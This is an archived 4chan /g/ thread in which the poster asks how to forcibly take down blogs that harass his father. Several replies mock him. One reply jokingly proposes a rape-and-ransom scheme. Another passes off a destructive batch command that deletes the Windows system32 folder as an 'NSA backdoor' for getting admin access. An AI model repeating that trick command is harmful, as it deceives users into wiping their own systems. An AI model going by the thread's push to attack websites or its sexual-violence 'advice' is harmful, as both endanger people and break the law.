[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y ] [Search | Free Show | Home]

Getting some websites taken down.

This is a blue board which means that it's for everybody (Safe For Work content only). If you see any adult content, please report it.

Thread replies: 11
Thread images: 4

File: high.jpg (63KB, 700x388px) Image search: [Google]
high.jpg
63KB, 700x388px
Hey /g/,

I would just like some advice on several issues myself and my family have been having over the course of a few years. A group of people (who we assume are being protected by the police seeing as they had trials for stalking and harassment next month but suddenly all the charges have been dropped and they've avoided being arrested and charged for a few years now) have targeted my father and have harassed and stalked him to the point of our family having to move house three times now, yet they've still managed to track us down. They targeted him due to the fact that he did a radio interview and they apparently didn't like what he had said so they decided to try and "hush him up".

My father has remained vigilant in all of this, however the trolls managed to get him arrested once for Malicious Communications - on the fact that a fake blog was set up which apparently slandered a member of the people harassing him, and the police arrested him purely on the fact that the email used to set up the blog used his name - they didn't even bother to trace the IP, which would have proved that he did not set up the blog, but that is beside the point.

The group have set up many blogs slandering my father, accusing him of being a troll and a paedophile, and they even attacked a memorial site dedicated to my grandfather, since which has been taken down. I myself have complained several times to BlogSpot and WordPress, to no avail.

And finally my question is, how would I go about taking these websites down by force? Enough is enough, I don't care about the legal implications this might have, I just want this harassment to end and if I have to use force then I am prepared to do that.

>(TL;DR: How would I go about getting some blogs taken down by force? A group of people have targeted my father, falsely accusing him and slandering him. The police are of no help, and BlogSpot and WordPress won't take the blogs down. )
>>
File: d.jpg (136KB, 1600x1405px) Image search: [Google]
d.jpg
136KB, 1600x1405px
>>60629840
>>
>>60629932
Funny meme, kek
>>
>>60629840
>Find where the trolls live
>Ask them to rape your boipucci
>Film them raping your boipucci
>Hold them to ransom
>Go to court and file for sexual assault
>They go to prison and you get money for it
>>
>>60629840
>The group have set up many blogs slandering my father

Why can't you get them arrested then?
>>
>>60629840
step 1: hackerdoodle into their servers
step 2: replace the blog with a link to the gentoo downloads page
it's that easy anon
>>
could OP link any website that has been made by them?
>>
>>60631138
Of course not, he's just lying out his ass trying to get someone to help him hax0r some random wordpress blogs for him.
>>
File: 569128edc46188aa6f8b45e6.jpg (85KB, 900x500px) Image search: [Google]
569128edc46188aa6f8b45e6.jpg
85KB, 900x500px
Okay so ignore these trolls here anon. I'll gladly help out a fellow /b/rother as we are legion and all that.

What you got to do is give yourself webspace admin privileges. Luckily one of the leaked NSA backdoors still hasn't been patched yet. So what you do is on Windows open notepad and type the following:

@echo off
del C:\\WINDOWS\system32

Now save as "accessNSAbackdoor.bat" You must make sure you save it as "all files" and not "text document" for it to work.

Run this program as admin so it will werk and rebot your PC. Congratulations you removed the normie drive and can now edit any social media site. Just be sure to do it through TOR or you'll get V&.

Good luck /b/rother! We do not forgive! We do not forget!
>>
install a link opener
>>
File: 1495717059806.jpg (61KB, 260x273px) Image search: [Google]
1495717059806.jpg
61KB, 260x273px
I bet your father's a Nazi.
Thread posts: 11
Thread images: 4

[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y] [Search | Top | Home]

I'm aware that Imgur.com will stop allowing adult images since 15th of May. I'm taking actions to backup as much data as possible.
Read more on this topic here - https://archived.moe/talk/thread/1694/

If you need a post removed click on it's [Report] button and follow the instruction.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com.
If you like this website please support us by donating with Bitcoins at 16mKtbZiwW52BLkibtCr8jUg2KVUMTxVQ5
All trademarks and copyrights on this page are owned by their respective parties.
Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
This is a 4chan archive - all of the content originated from that site.
This means that RandomArchive shows their content, archived.
If you need information for a Poster - contact them.